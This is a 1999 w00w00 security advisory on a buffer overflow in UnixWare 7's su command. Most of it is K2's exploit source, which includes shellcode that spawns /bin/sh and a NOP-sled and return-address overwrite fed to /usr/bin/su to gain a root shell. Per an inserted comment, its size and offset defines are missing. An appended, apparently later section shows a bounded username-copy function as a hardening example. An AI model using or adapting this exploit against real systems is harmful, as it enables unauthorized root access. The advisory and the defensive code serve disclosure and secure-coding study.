w00giving 99 -6-
w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html
----------------------------------------------------------------------------

Sorry, we've been really tied up these past 2-3 weeks and have been unable to
write up the advisories. We'll send three SCO advisories tonight to make up
for it. We should have some interesting ones within the next two weeks (it's
really hard to find the time to write up the exploits and advisories).

You'll notice we jumped from #3 to #5. w00giving advisory #4 has been
available on http://www.w00w00.org/advisories.html for 2-3 weeks, but it
wasn't posted to this list. w00w00.org has had hits from 55 different
countries as of yesterday.

If you are going to send out advisories, please cc them to
news@technotronic.com, also. You can subscribe to it by sending "subscribe
news" to majordomo@technotronic.com. Technotronic is a good site and
beginning now, you will always see our advisories/articles/code posted on
there first (order of release: w00w00.org, news@technotronic.com, news
groups, bugtraq).

----------------------------------------------------------------------------

Discovered by: K2 (ktwo@ktwo.ca)

The su command on SCO's UnixWare 7 has improper bounds checking on the
username passed (via argv[1]), which can cause a buffer overflow when a
lengthy username is passed.
----------------------------------------------------------------------------

Exploit (by K2):

// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The #define lines for SIZE, DEFOFF and NOPDEF did not survive in this
   copy of the post; the code below refers to them as the original did. */

char shell[] =
  "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
  "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
  "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
  "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
  "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
  "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

const char x86_nop = 0x90;
long nop, esp;
long offset = DEFOFF;
char buffer[SIZE];

long get_esp()
{
  __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
  register int i;

  if (argc > 1)
    offset += strtol(argv[1], NULL, 0);
  if (argc > 2)
    nop += strtoul(argv[2], NULL, 0);
  else
    nop = NOPDEF;

  esp = get_esp();

  memset(buffer, x86_nop, SIZE);
  memcpy(buffer + nop, shell, strlen(shell));
  for (i = nop + strlen(shell); i < SIZE - 4; i += 4)
    *((int *) &buffer[i]) = esp + offset;

  printf("offset = [0x%x]\n", esp + offset);
  execl("/usr/bin/su", "su", buffer, NULL);
  printf("exec failed!\n");
  return 0;
}

----------------------------------------------------------------------------

Patch: SCO is in the process of fixing a list of vulnerabilities we sent a
few weeks ago.

----------------------------------------------------------------------------
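For comparison, the following is an added example (written for this page; it is not K2's code, nor SCO's su source) of the defect class the advisory describes and of the bounded handling that avoids it: a setuid program taking the target account name from argv[1] must check the argument's length against its buffer before copying. USERNAME_MAX is an assumed bound chosen for illustration; the real limit on a given system comes from its login-name definition.

```c
#include <stdio.h>
#include <string.h>

/* Assumed bound on a login name; chosen for illustration only. */
#define USERNAME_MAX 32

/* The defect class the advisory describes: argv[1] copied into a fixed
 * stack buffer with no length check, so an overlong name overruns it.
 * Shown for comparison only; nothing in this file calls it. */
void copy_username_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: bounded scan and character-set check before the copy.
 * Never reads more than dstlen bytes of src.  Returns 0 on success,
 * -1 if src is missing, empty, overlong for dst, or contains a
 * character outside a conservative login-name alphabet. */
int copy_username_safe(char *dst, size_t dstlen, const char *src)
{
    size_t i;

    if (src == NULL || dst == NULL || dstlen == 0)
        return -1;
    for (i = 0; src[i] != '\0'; i++) {
        char c = src[i];
        if (i >= dstlen - 1)          /* no room left for the terminator */
            return -1;
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.'))
            return -1;
    }
    if (i == 0)                       /* empty name is not a user */
        return -1;
    memcpy(dst, src, i);
    dst[i] = '\0';
    return 0;
}

/* Mirrors su's handling of argv[1]: 1 if the argument would be accepted
 * as a target user name, 0 if it is rejected before any copy happens. */
int username_ok(const char *arg)
{
    char name[USERNAME_MAX + 1];
    return copy_username_safe(name, sizeof name, arg) == 0;
}

int main(int argc, char *argv[])
{
    const char *arg = argc > 1 ? argv[1] : "root";   /* su defaults to root */
    char name[USERNAME_MAX + 1];

    if (copy_username_safe(name, sizeof name, arg) != 0) {
        fprintf(stderr, "su: invalid user name\n");
        return 1;
    }
    printf("would switch to user \"%s\"\n", name);
    return 0;
}
```

The point of the bounded loop is that the length test happens on every byte before anything is written, so an argument of any length, including the "lengthy username" the advisory mentions, is rejected without touching the stack buffer. The character-set check is a separate, stricter policy: it also rules out names that could not exist in the passwd database, which keeps odd bytes out of later parsing and logging.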